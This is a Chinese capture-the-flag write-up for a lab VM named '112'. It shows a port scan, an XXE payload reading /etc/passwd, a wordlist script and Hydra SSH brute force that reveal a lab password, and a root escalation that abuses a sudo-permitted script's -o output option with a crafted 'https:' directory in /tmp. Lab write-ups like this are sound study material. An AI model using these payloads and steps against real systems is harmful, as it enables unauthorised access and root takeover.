112

192.168.100.35

信息搜集

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
root@LAPTOP-O235O5EH [~] ➜  rustscan -a 192.168.100.35                                                       [12:29:53]
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Open ports, closed hearts.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.35:22
Open 192.168.100.35:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-17 12:30 CST
Initiating ARP Ping Scan at 12:30
Scanning 192.168.100.35 [1 port]
Completed ARP Ping Scan at 12:30, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:30
Completed Parallel DNS resolution of 1 host. at 12:30, 13.00s elapsed
DNS resolution of 1 IPs took 13.00s. Mode: Async [#: 2, OK: 0, NX: 0, DR: 1, SF: 0, TR: 4, CN: 0]
Initiating SYN Stealth Scan at 12:30
Scanning 192.168.100.35 [2 ports]
Discovered open port 22/tcp on 192.168.100.35
Discovered open port 80/tcp on 192.168.100.35
Completed SYN Stealth Scan at 12:30, 0.01s elapsed (2 total ports)
Nmap scan report for 192.168.100.35
Host is up, received arp-response (0.00050s latency).
Scanned at 2026-01-17 12:30:47 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:C1:42:66 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 13.15 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

80/tcp

是一个xml输入框

image

1
2
3
4
5
6
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "file:///etc/passwd">
]>
<r>&sp;</r>

image

有用户名了但是没有密码,注意看画框的,这个字段是描述tuf用户的,但是中间两个是*怀疑是密码,需要爆破

写个脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import string

# 定义字符集:数字 + 大小写字母(62个)
charset = string.digits + string.ascii_letters
# 密码模板(*为未知两位)
password_template = "KQNPHFqG{}{}JHcYJossIe"

# 生成所有候选密码并写入文件(每行一个密码)
with open("password_dict.txt", "w", encoding="utf-8") as f:
    for c1 in charset:
        for c2 in charset:
            # 生成完整候选密码
            candidate_pwd = password_template.format(c1, c2)
            f.write(candidate_pwd + "\n")

# 验证生成结果
total = len(charset) **2
print(f"密码字典生成完成!共 {total} 个候选密码,保存到 password_dict.txt")
print(f"示例密码:{password_template.format('0','0')}")

hydra爆破

1
2
3
4
5
6
7
8
9
10
root@LAPTOP-O235O5EH [~/Desktop] ➜  hydra -l tuf -P password_dict.txt -t 4 192.168.100.35 ssh                [12:33:35]
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-01-17 12:33:53
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 3845 login tries (l:1/p:3845), ~962 tries per task
[DATA] attacking ssh://192.168.100.35:22/
[22][ssh] host: 192.168.100.35   login: tuf   password: KQNPHFqG6mJHcYJossIe
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-01-17 12:34:06

tuf:KQNPHFqG6mJHcYJossIe

1
ssh tuf@192.168.100.35

提权

1
sudo -l

可以执行/opt/112.sh

源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#!/bin/bash
input_url=""
output_file=""
use_file=false
regex='^https://maze-sec.com/[a-zA-Z0-9/]*$'
while getopts ":u:o:" opt; do
    case ${opt} in
        u) input_url="$OPTARG" ;;
        o) output_file="$OPTARG"; use_file=true ;;
        \?) echo "错误: 无效选项 -$OPTARG"; exit 1 ;;
        :) echo "错误: 选项 -$OPTARG 需要一个参数"; exit 1 ;;
    esac
done
if [[ -z "$input_url" ]]; then
    echo "错误: 必须使用 -u 参数提供URL"
    exit 1
fi
if [[ ! "$input_url" =~ ^https://maze-sec.com/ ]]; then
    echo "错误: URL必须以 https://maze-sec.com/ 开头"
    exit 1
fi
if [[ ! "$input_url" =~ $regex ]]; then
    echo "错误: URL包含非法字符,只允许字母、数字和斜杠"
    exit 1
fi
if (( RANDOM % 2 )); then
    result="$input_url is a good url."
else
    result="$input_url is not a good url."
fi
if [ "$use_file" = true ]; then
    echo "$result" > "$output_file"
    echo "结果已保存到: $output_file"
else
    echo "$result"
fi

1. 变量初始化

1
2
3
4
input_url=""
output_file=""
use_file=false
regex='^https://maze-sec.com/[a-zA-Z0-9/]*$'

  • input_url="":初始化存储用户输入 URL 的变量,默认空值。

  • output_file="":初始化存储输出文件路径的变量,默认空值。

  • use_file=false:标记是否将结果写入文件(默认不写入,仅输出到终端)。

  • regex='...':定义 URL 合法性校验的正则表达式,规则是:

    • 必须以 https://maze-sec.com/ 开头;
    • 后续只能包含字母(大小写)、数字、斜杠(/);
    • * 表示后续符合规则的字符可以出现 0 次或多次。

2. 解析命令行参数

1
2
3
4
5
6
7
8
while getopts ":u:o:" opt; do
    case ${opt} in
        u) input_url="$OPTARG" ;;
        o) output_file="$OPTARG"; use_file=true ;;
        \?) echo "错误: 无效选项 -$OPTARG"; exit 1 ;;
        :) echo "错误: 选项 -$OPTARG 需要一个参数"; exit 1 ;;
    esac
done

  • getopts ":u:o:" opt​:指定脚本支持 -u​ 和 -o​ 两个选项,:​ 表示选项需要跟参数(比如 -u https://xxx​),开头的 : 是为了自定义错误提示。

  • case ${opt} 分支处理:

    • u)​:将 -u​ 后面的参数(URL)赋值给 input_url
    • o)​:将 -o​ 后面的参数(文件路径)赋值给 output_file​,并将 use_file​ 设为 true(标记要写入文件);
    • \?)​:用户输入了脚本不支持的选项(比如 -x​),报错并退出(exit 1 表示异常退出);
    • :)​:用户只写了选项但没给参数(比如只写 -u 没写 URL),报错并退出。

3. URL 合法性校验

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# 校验1:必须提供 -u 参数(URL 不能为空)
if [[ -z "$input_url" ]]; then
    echo "错误: 必须使用 -u 参数提供URL"
    exit 1
fi

# 校验2:URL 必须以 https://maze-sec.com/ 开头
if [[ ! "$input_url" =~ ^https://maze-sec.com/ ]]; then
    echo "错误: URL必须以 https://maze-sec.com/ 开头"
    exit 1
fi

# 校验3:URL 必须匹配正则(仅含字母、数字、斜杠)
if [[ ! "$input_url" =~ $regex ]]; then
    echo "错误: URL包含非法字符,只允许字母、数字和斜杠"
    exit 1
fi

这部分是脚本的校验核心,只要有一个校验失败,脚本就会报错并退出:

  • [[ -z "$input_url" ]]​:判断 input_url​ 是否为空(-z 表示 “空字符串”);
  • [[ ! "$input_url" =~ 正则 ]]​:=~​ 是 Bash 的正则匹配运算符,! 表示 “不匹配”,即 URL 不符合规则时触发错误。

4. 生成随机结果

1
2
3
4
5
if (( RANDOM % 2 )); then
    result="$input_url is a good url."
else
    result="$input_url is not a good url."
fi
  • RANDOM​ 是 Bash 内置的随机数生成器(取值范围 0~32767);
  • RANDOM % 2​:取随机数的余数,结果只能是 0​ 或 1(50% 概率);
  • (( ... ))​:Bash 的数值判断语法,值为 1​ 时执行 then​ 分支(判定为 “good url”),值为 0​ 时执行 else 分支(判定为 “not a good url”)。

5. 结果输出

  • 如果用户指定了 -o​ 参数(use_file=true​):将结果写入 output_file​ 指定的文件(> 是覆盖写入),并提示文件路径;
  • 如果未指定 -o:直接将结果输出到终端。

思路

可以利用 -o参数将提权脚本写入到/opt/112.ssh中

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# 进入一个可写的临时目录
cd /tmp

# 注意:Linux 系统中多个斜杠会被视为一个,所以 https:// 会寻找名为 "https:" 的目录
mkdir -p "https:/maze-sec.com"

# 创建一个提权脚本,并赋予执行权限
echo -e '#!/bin/bash\n/bin/bash -p' > "https:/maze-sec.com/exploit"
chmod +x "https:/maze-sec.com/exploit"


sudo /opt/112.sh -u "https://maze-sec.com/exploit" -o /opt/112.sh


sudo /opt/112.sh

image